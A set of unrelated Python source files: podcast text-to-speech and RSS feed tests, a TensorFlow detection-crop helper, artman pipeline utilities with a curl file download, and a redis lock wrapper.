        self.podcast.episodes['Test Episode 1'].text_format = 'plain'
        self.podcast.episodes['Test Episode 1'].title = 'Test Episode 1'
        self.podcast.episodes['Test Episode 1'].author = 'Test Episode Author'
        self.podcast.episodes['Test Episode 1'].published = True
        self.podcast.episodes['Test Episode 1'].summary = None
        self.podcast.episodes['Test Episode 1'].link = '.test/test_episode_1.mp3'
        self.podcast.episodes['Test Episode 1'].publish_date = datetime.utcnow()
        self.podcast.episodes['Test Episode 1'].length = 3884
        self.podcast.episodes['Test Episode 1'].duration = '00:00:0.9'
        self.podcast.episodes['Test Episode 1'].synth_args = {'username': '', 'password': ''}
        self.feed = ET.parse('tests/test_files/test_feed.xml')
        self.feed_string = ET.tostring(self.feed.getroot()).decode().replace(' ', '').replace('\n', '')
        self.synthesizer = 'watson'
        self.synth_args = {'username': '', 'password': ''}
        if not os.path.exists(self.podcast.output_path):
            os.makedirs(self.podcast.output_path)

    @responses.activate
    def test_text_to_speech(self):
        # One sentence synthesizes to exactly one copy of the sample audio.
        catch_requests()
        text = ('hello')
        audio = utils.text_to_speech(text=text, synthesizer=self.synthesizer, synth_args=self.synth_args, sentence_break='. ')
        sample = AudioSegment.from_wav('tests/test_files/test.wav')
        audio.export('.test_utils/test.mp3', format='mp3')
        # FIX: assertEquals is a deprecated alias (removed in Python 3.12).
        self.assertEqual(len(audio), len(sample))

    @responses.activate
    def test_text_to_speech_synth_not_found(self):
        catch_requests()
        text = ('hello')
        with self.assertRaises(ValueError):
            audio = utils.text_to_speech(text=text, synthesizer='not found', synth_args=self.synth_args, sentence_break='. ')  # noqa

    @responses.activate
    def test_text_to_speech_sentence_break(self):
        # Breaking on spaces yields 51 synthesized chunks, so the result is
        # longer than 50 copies of the sample.
        catch_requests()
        text = ('hello ' * 51)
        audio = utils.text_to_speech(text=text, synthesizer=self.synthesizer, synth_args=self.synth_args, sentence_break=' ')
        sample = AudioSegment.from_wav('tests/test_files/test.wav')
        self.assertGreater(len(audio), len(sample) * 50)

    @responses.activate
    def test_text_to_speech_break_synth_not_found(self):
        catch_requests()
        text = ('hello ' * 51)
        with self.assertRaises(ValueError):
            audio = utils.text_to_speech(text=text, synthesizer='not found', synth_args=self.synth_args, sentence_break=' ')  # noqa

    @responses.activate
    def test_text_to_speech_credential_warning(self):
        # Missing or partial Watson credentials must raise a Warning.
        catch_requests()
        with self.assertRaises(Warning):
            audio = utils.text_to_speech(text='text', synthesizer=self.synthesizer, synth_args={}, sentence_break=' ')
        with self.assertRaises(Warning):
            audio = utils.text_to_speech(text='text', synthesizer=self.synthesizer, synth_args={'username': ''}, sentence_break=' ')  # noqa

    def test_build_rss_feed(self):
        # This test ignores the pubDate tag in the RSS feed.
        utils.build_rss_feed(self.podcast)
        feed = ET.parse('.test_utils/feed.xml')
        feed_root = feed.getroot()
        items = feed_root.find('channel').findall('item')
        for item in items:
            item.remove(item.find('pubDate'))
        feed_string = ET.tostring(feed_root).decode().replace(' ', '')
        # FIX: assertEquals -> assertEqual (deprecated alias).
        self.assertEqual(feed_string, self.feed_string)

    def tearDown(self):
        # Remove artifacts written by the tests.
        if os.path.exists('.temp.wav'):
            os.remove('.temp.wav')
        if os.path.exists('.test_utils/'):
            shutil.rmtree('.test_utils/')
|
import numpy as np
import tensorflow as tf
def _to_int32(a):
return np.int32(np.ceil(a))
def extract_patches(detector: tf.keras.models.Model,
                    img: tf.TensorArray,
                    min_score: float = 0.4,
                    max_boxes: int = 10):
    """Run *detector* on *img* and crop out the highest-scoring detections.

    Args:
        detector: detection model; called with a batched image, it returns a
            dict containing "detection_boxes" and "detection_scores" tensors.
        img: input image tensor (assumed unbatched — the batch axis is
            added here; presumably (H, W, C), TODO confirm with callers).
        min_score: detections scoring below this threshold are skipped.
        max_boxes: consider at most this many detections.

    Returns:
        dict with "results" (list of per-detection dicts holding the cropped
        numpy array, its score, and the pixel bounding box as
        (xmin, xmax, ymin, ymax)) plus the image "height" and "width".
    """
    img_shape = tf.shape(img)
    im_height, im_width = img_shape[0].numpy(), img_shape[1].numpy()

    # The detector expects a batch dimension; pull all outputs back to numpy.
    outputs = detector(img[tf.newaxis, ...])
    outputs = {name: tensor.numpy() for name, tensor in outputs.items()}
    boxes = outputs["detection_boxes"][0]
    scores = outputs["detection_scores"][0]

    patches = []
    for idx, box in enumerate(boxes[:max_boxes]):
        if scores[idx] < min_score:
            continue
        ymin, xmin, ymax, xmax = tuple(box)
        # Normalized [0, 1] coordinates -> pixel coordinates, rounded up.
        xmin = _to_int32(xmin * im_width)
        xmax = _to_int32(xmax * im_width)
        ymin = _to_int32(ymin * im_height)
        ymax = _to_int32(ymax * im_height)
        crop = tf.image.crop_to_bounding_box(
            img, ymin, xmin, ymax - ymin, xmax - xmin)
        patches.append({
            "arr": crop.numpy(),
            "score": scores[idx],
            "bounding_box": (xmin, xmax, ymin, ymax),
        })

    return {
        "results": patches,
        "height": im_height,
        "width": im_width
    }
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utils related to pipeline"""
import os
import subprocess
from six.moves import urllib
from taskflow import engines
from taskflow.patterns import linear_flow
from artman.tasks import io_tasks
from artman.utils.logger import logger
def validate_exists(required, **kwargs):
    """Raise ValueError unless every name in *required* appears in kwargs."""
    missing = [name for name in required if name not in kwargs]
    if missing:
        # Report the first missing argument, in *required* order.
        raise ValueError('{0} must be provided'.format(missing[0]))
def validate_does_not_exist(unsupported, **kwargs):
    """Raise ValueError if any name in *unsupported* appears in kwargs."""
    offending = next((name for name in unsupported if name in kwargs), None)
    if offending is not None:
        raise ValueError('{0} is not supported'.format(offending))
def download(url, directory):
    """Download *url* into *directory*, skipping files already present.

    Args:
        url: URL to fetch; the local filename is taken from the URL path.
        directory: destination directory, created if necessary.

    Returns:
        The local path of the (possibly pre-existing) file.
    """
    filename = os.path.basename(urllib.parse.urlsplit(url).path)
    # Bug fix: the existence check used os.path.join while the curl target
    # and return value used plain `directory + filename`, so a directory
    # without a trailing separator was checked at one path but written to
    # (and reported at) another. Build the path once and use it everywhere.
    local_path = os.path.join(directory, filename)
    if not os.path.isfile(local_path):
        # os.makedirs replaces shelling out to `mkdir -p`.
        os.makedirs(directory, exist_ok=True)
        logger.info('Downloading file from URL: %s' % url)
        subprocess.check_call(['curl', '-o', local_path, '-sL', url])
    return local_path
def task_transition(state, details):
    """Notification callback: log a task's transition into *state*."""
    task_name = details['task_name']
    logger.info('Task "%s" transition to state %s.' % (task_name, state))
def download_from_gcs(bucket_name, path, output_dir):
    """Download a blob from a GCS bucket into *output_dir* via taskflow."""
    store = {
        'bucket_name': bucket_name,
        'path': path,
        'output_dir': output_dir,
    }
    flow = linear_flow.Flow('download_from_gcs')
    flow.add(io_tasks.BlobDownloadTask('BlobDownload'))
    engines.load(flow, engine="serial", store=store).run()
|
from __future__ import absolute_import
import logging
import redis
import time
from contextlib import contextmanager
from random import random
from .container import Container
class UnableToGetLock(Exception):
    """Raised by _Redis.lock when the redis lock cannot be acquired."""
    pass
class _Redis(object):
    """Thin wrapper around a redis client configured from ``app.config``.

    Attributes not defined here are proxied straight to the underlying
    redis connection via ``__getattr__``.
    """

    def __init__(self, app, options):
        # `options` is currently unused beyond the Container plumbing.
        self.app = app
        self.redis = redis.from_url(app.config['REDIS_URL'])
        self.logger = logging.getLogger(app.name + '.redis')
        # TODO(kylec): Version check to fail early if we're connected to a
        # redis-server that doesn't support the operations we use.

    def __getattr__(self, name):
        # Fall through to the raw redis client for anything not wrapped here.
        return getattr(self.redis, name)

    @contextmanager
    def lock(self, lock_key, expire=None, blocking_timeout=3, nowait=False):
        """
        Returns a context for locking a redis lock with the given key
        Args:
            lock_key (string): key to lock
            expire (float): how long (in seconds) we can hold lock before it is
                automatically released
            blocking_timeout (float): how long (in seconds) to try locking until we give up.
            nowait (bool): if True, don't block if can't acquire the lock
                (will instead raise an exception)
        """
        conn = self.redis
        if expire is None:
            expire = blocking_timeout
        # Randomized retry sleep, presumably to stagger waiters polling the
        # same key — TODO confirm.
        delay = 0.01 + random() / 10
        lock = conn.lock(lock_key, timeout=expire, sleep=delay)
        acquired = lock.acquire(blocking=not nowait, blocking_timeout=blocking_timeout)
        # This is likely slightly after it was actually acquired, but it avoids reporting blocked
        # time as time spent holding the lock.
        start = time.time()
        self.logger.info('Acquiring lock on %s', lock_key)
        if not acquired:
            # Covers both the nowait case and a blocking_timeout expiry.
            raise UnableToGetLock('Unable to fetch lock on %s' % (lock_key,))
        try:
            yield
        finally:
            self.logger.info('Releasing lock on %s', lock_key)
            try:
                lock.release()
            except Exception:
                # notably, an exception is raised if we release a lock we don't
                # own, e.g. because it expired while we held it.
                self.logger.exception("Error releasing lock %s acquired around %ss ago", lock_key, time.time() - start)

    def incr(self, key):
        # NOTE(review): the redis INCR command returns the new value but this
        # wrapper discards it — confirm callers don't need it.
        self.redis.incr(key)

    def decr(self, key):
        # NOTE(review): return value discarded, mirroring incr above.
        self.redis.decr(key)
def Redis(**options):
    """Build a Container around _Redis, registered under the name 'redis'."""
    return Container(_Redis, options, name='redis')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.